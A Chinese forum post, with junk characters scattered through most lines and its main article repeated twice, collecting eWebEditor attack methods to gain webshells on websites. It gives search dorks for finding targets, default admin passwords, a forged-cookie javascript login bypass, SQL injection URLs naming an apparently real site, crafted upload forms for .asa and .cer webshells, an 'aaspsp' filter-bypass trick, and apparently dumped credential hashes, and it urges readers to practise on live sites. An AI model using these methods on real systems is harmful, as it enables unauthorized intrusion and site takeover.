eWebEditor.asp?id=45&style=standard1 样式调用
' _$ O9 O p3 _. ^! ^8 f
; L, R# t$ g5 F/ b+ q' f$ A5 D! c8 v
0 R+ x6 l; z+ i/ \. u! O/edit/admin_uploadfile.asp?id=14&dir=../../..9 y; u" _; d0 a1 p
可以浏览网站目录 ../自己加或者减/ Q: I& D. i" T* o* F
5 ^1 B2 W: s5 r) C! P. R有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞& n7 A* o }/ o; W' `
简单利用就是
1 Y* T& W0 c3 q3 |http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v2002 W- m" \+ y6 B! Z- E% a
http://www.siqinci.com/ewebedito ... amp;style=full_v200; F( I0 Y9 s) h$ Y
可以利用nbsi进行猜解,对此进行注入
! O U& [; N" N" X$ Q: W还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
5 |+ u" p6 M A# z$ d0 |" v3 [这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:/ V' z2 u m/ w
在action下面
9 B% y% @: v. u: ^0 e2 X1 B<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">. V5 d# H) T) A0 P! o
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
1 O& J# S7 X; F! D3 O<input type="submit" name="uploadfile" value="提交">: D) Z! q5 v; O T
<input type=hidden name=originalfile value="">4 j$ B2 }/ M; y; \
</form>
) \" s1 |8 U( j1 u------------------------------------------------------------------------------------------------------------------------------------------------
" Q9 Q0 c. u) R" Q/ @) s; }8 P<input type="submit" name="uploadfile" value="提交"> 放在action后头- X/ C* O! B4 @
,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。3 l: Q: x; `# z0 B: k
' i% t [/ K8 d" f
; s0 I2 ]8 C) V/ `
* J$ t w1 A1 X. P; B2 q3 E7 z! v7 C
1 ^( T2 Y! m, A% h% FEwebeditor最新漏洞及漏洞大全[收集] (图)
( e7 d" S1 p* c; _本帖最后由 administrator 于 2009-7-7 21:24 编辑" _- J5 h: r1 w G- `. A# b
7 p) `, U. |- G+ `5 F9 C7 H以下文章收集转载于网络, O% L$ D2 E# J& k) L0 i
#主题描述# ewebeditor 3.8漏洞[php]. A' l5 o1 v4 ^" _1 T
--------------------------------------------------------------------------------------------7 I0 d& [9 Q6 V, \! _$ |2 ?6 h8 r
#内容#
* q. j9 o1 Z6 ^php版ewebeditor 3.8的漏洞; ]5 W2 m% L+ ?, A3 z* S$ p
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
" W9 D( p: k8 d1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,# ^; K6 r$ u& ^; s: ?
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
" I7 T% w$ p7 }" k1 v* ]9 k3 后面的利用和asp一样,新增样式修改上传,就ok了4 M, C- {& J0 l, p& z+ B! P
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
6 t7 e2 t4 c, l; d. r( Caspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell( `8 E$ U% x& ?1 O, t$ e0 D
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了5 I( V, U; m+ v# h( \
--------------------------------------------------------------------------------------------2 S! x/ i# q! o5 ?3 l! F8 G! ?+ a
3 p2 k- W! r' i1 [+ E
$ y6 P0 P! H, Y, f! s算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
# a* Z$ W9 e! C; W8 G
8 n; k3 P- }/ @3 h& R漏洞更新日期TM: 2009 2 9日 转自zake’S Blog7 t5 P4 Q, b' U( I0 `+ f" n: S0 G
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
/ q& Y* s$ S5 y9 g4 U1 `那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址+ P: Z5 B+ v) @$ ?+ ?* A
3 j, ]5 R8 V9 d/ @) N! @+ o) R- x
) f/ ^, X; t9 [. B然后确定以后,这里是最关键的一部!
. g, p: E4 T* S- }3 m$ `- B这里点了远程上传以后,再提交得到木马地址
* z* U7 T6 Y* D- w; x2 r+ y3 M由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限" `$ K! M) Q L- Q# M
属于安全检测漏洞版本ewebeditor v6.0.0
& {9 X) ^ ~2 ^0 v* V
/ ~0 f* j/ k1 ]( U+ B; [以前的ewebeditor漏洞:
5 e) E2 A& \: E1 |' R4 _$ `2 P6 x& B7 W2 s
ewebeditor注入漏洞
; U; W! H6 S" n% }. _ n: {$ o' \# g, ]: P
大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb' G: @! k! e/ Y* R, j
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
) u' F& |' I# ?( C今天我给大家带来的也是ewebeditor编辑器的入侵方法" d& E6 _$ Q( z( N6 U
不过一种是注入,一种是利用upload.asp文件,本地构造2 y. Z2 \9 L8 y) r# R$ `
NO1:注入) ]2 W" h* O u, T: w: J$ h
http://www.XXX.com/ewebeditor200 ... amp;style=full_v200
3 S4 g! u+ t- A& X. i5 t" I编辑器ewebedior7以前版本通通存在注入1 |5 ^7 \" d- A7 Y, ^
直接检测不行的,要写入特征字符
. X9 \6 @, _4 s1 @我们的工具是不知道ewebeditor的表名的还有列名$ s5 j' V7 o3 A/ T; }2 B
我们自己去看看
) q6 R C7 M3 p8 c" G6 K% Y+ c4 Y哎。。先表吧# U" q* Y# w" i! T" Q* N2 n
要先添加进库+ p$ u, }: ~! q% c. P
开始猜账号密码了
0 L2 i# V4 b k4 F6 ~我们==
. ^- \1 k9 q( ]2 A心急的往后拉: E4 x; i% k+ Q' \/ G9 i! l6 h0 W7 k
出来了
& G0 M) |+ v7 `7 n* p) t[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120+ d' C: \8 \! k+ r: v; f4 [
对吧^_^3 i5 @% V6 y V
后面不说了+ R. j8 C4 ]3 A( W; E$ G
NO2:利用upload.asp文件,本地构造上传shell0 {, P4 l/ Y) Y( F" }
大家看这里! v8 C/ a5 c9 Q7 d* ]9 I# r
http://www.siqinci.com/ewebedito ... lepreview&id=372 f; }4 y% R# g" M5 @% u
如果遇见这样的情况又无法添加工具栏是不是很郁闷+ H; e! N9 {* f2 k9 `
现在不郁闷了,^_^源源不一般. J3 B4 X2 N, u% A$ L! t
我们记录下他的样式名“aaa”
0 K3 o6 `8 C) I j% S% ]& Z我已经吧upload.asp文件拿出来了- S! t4 m8 _6 G
我们构造下
, ^& q# E0 h& m4 `9 o2 \. bOK,我之前已经构造好了
! B) s2 U! b- m" ]其实就是这里! L* [# `( a4 M
<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>
* R7 `/ ]: r% \& a! H( q% R; h<input type=file name=uploadfile size=1 style=”width:100%”>( c. J$ ~! U% }% [) c
<input type=submit value=”上传了”></input>
- X# i& Y* K4 y</form>; j/ G: F% l1 c- y9 b! d
下面我们运行他上传个大马算了5 L; ~4 @9 G2 F- }- u3 r( Q
UploadFile上传进去的在这个目录下
4 H8 q, ~7 q: Q2 l) _/ ?2008102018020762.asa
|0 a3 K) T% r& m3 \
1 E b5 k3 E! b' i3 i6 _过往漏洞:* A2 Z- }6 i: k0 m: r3 w8 l( F
% t$ t* [+ \; x' O Y首先介绍编辑器的一些默认特征:( ?6 w! }) j5 M8 P+ M
默认登陆admin_login.asp
; j/ h9 |; @1 p& g X3 J默认数据库db/ewebeditor.mdb! `) [0 r! X& J! {: j
默认帐号admin 密码admin或admin888
. M1 q$ `% U" q# C7 J' `0 E搜索关键字:”inurl:ewebeditor” 关键字十分重要3 w0 }' p% O" F9 H+ Q8 l& |
有人搜索”eWebEditor - eWebSoft在线编辑器”
& L, z2 X6 n0 j根本搜索不到几个~
8 \ A0 \# u8 o$ e5 `0 a; Obaidu.google搜索inurl:ewebeditor
: H( p% h* o6 P! o. {- x) S几万的站起码有几千个是具有默认特征的~
' P) }4 e" \: _' N那么试一下默认后台
, W: K3 ]3 T h( b% J+ v/ Shttp://www.xxx.com.cn/admin/ewebeditor/admin_login.asp
5 l3 J& G% h1 p* p" }, R试默认帐号密码登陆。2 N) @( g# l" x
利用eWebEditor获得WebShell的步骤大致如下:1 \$ O! l& A( [: U
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
1 r2 E/ F+ x4 S( M% A2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
% u1 X) k! ^1 v/ D3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。$ A3 T* a" b' T/ }8 } I
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
! e% [& U/ Y" p. v/ n: X4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。 [3 C/ k( m; d6 j( r1 `! v
然后在上传的文件类型中增加“asa”类型。
2 o1 q0 U: D# e7 s5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。1 y% c" z# d' {; \; t( G K3 Y
漏洞原理
( j- u* ^9 U' e# k9 P漏洞的利用原理很简单,请看Upload.asp文件:
4 H, o0 K! l# o) N4 c# v任何情况下都不允许上传asp脚本文件 g$ w# j: P& _1 B
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)$ j+ ?2 J( c' m
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
/ v B1 r# v" c: m, q9 Q- x) n高级应用
4 o q% t) |6 H% }+ M# V2 a5 I. H) }- feWebEditor的漏洞利用还有一些技巧:
# ~* d- e% T+ [4 {7 L8 Q+ P1.使用默认用户名和密码无法登录。7 ?0 q2 e4 m; ]/ B1 t- t
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
( C. ^9 h( }. K) G: p! ?8 ^2.加了asa类型后发现还是无法上传。
: c( g, T3 x& ?- p. w" A应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:
j8 K K8 ]3 r1 r2 bsAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
) ^: Q, C, T1 \& W猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。. r4 e/ T( y+ H6 K+ C- v5 W
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
8 x, [/ c# ?. }! v5 B& U呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
; l/ p4 ?/ Y3 \# u7 C: e; z& A: R4.已经使用了第2点中的方法,但是asp类型还是无法上传。! U) P' o. d! q8 o& C
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。; @6 f4 N- R. k& V* a
后记
' x: u# Z; t& y: K$ M根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
; o2 W+ ?' ^1 _/ o* J基本入侵基础漏洞0 X- D. l+ y3 ^* P
eWebEditor 漏洞
/ r$ a2 M C! S: g" T5 }/ E) o7 s
各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦! 6 X* V$ _% |3 B* q4 l+ s
+ [3 E3 r( f# a6 a' o9 `& o' r, H漏洞利用' G0 M: M2 p3 F0 e% [! U# b
利用eWebEditor获得WebShell的步骤大致如下:
0 [- i) x9 d3 S! q1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
8 `8 ~8 ]) S+ w- w$ K4 l. D2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。5 z f6 l; c- R
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。2 k& R" h; c* T5 ?1 F" y5 w# m
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
4 t# s2 G* ~) I& ^4 e# O8 l# O2 ]4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
+ O; V6 F1 p# |. V {1 L% ` k# m" J G6 C2 e- b
然后在上传的文件类型中增加“asa”类型。
! k# _5 ~8 G& V P2 V$ y' ~& J, K7 m0 r; d3 _7 z! r
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
- J9 I" E; D% b- D; }* o' M& j
3 ^/ u( [3 {0 t6 S2 u% k1 H! }+ I- I. v- F9 e
漏洞原理/ x+ C& r$ d! e% r
漏洞的利用原理很简单,请看Upload.asp文件:
1 e* p6 L* u+ ]2 ?任何情况下都不允许上传asp脚本文件0 ]; \$ n! L$ P' n/ `; C
sAllowExt = replace(UCase(sAllowExt), "ASP", "")1 G( g' Z+ Z8 s* D7 D/ ]. B, \1 x
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!6 M6 q9 A. B2 I" I% Z
' M3 U3 V6 m% B, f- f% ]6 a& A
高级应用" k4 J2 N& Q3 Y
eWebEditor的漏洞利用还有一些技巧:
. o5 D+ B1 g; j* c0 y6 V1.使用默认用户名和密码无法登录。/ g( c- |( f# h) @; @% f/ |
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。$ g3 W+ t3 ~7 K4 g$ d
2.加了asa类型后发现还是无法上传。- ^: F) V( d0 H' L* `+ ?
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
6 O7 D$ i2 ?6 C3 s0 B5 E" L4 SsAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")0 \5 N3 @3 I5 p+ J* N2 d# @
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。; r- I( H0 P) ?1 x) f- r
3.上传了asp文件后,却发现该目录没有运行脚本的权限。: w- N0 ?" t+ ^# O4 ^% u9 u$ s
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。: Q$ q1 ]+ X& C( E
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
* C" W$ S. q- H1 m( ]/ q看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。# A* {& {7 p7 \. _ f' b: k# u5 [ w
- h9 B7 C( Y0 n后记
3 ]( }' r! q4 @/ T" g n2 _根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |
发表于 2012-9-13 17:00:58
收藏
支持
反对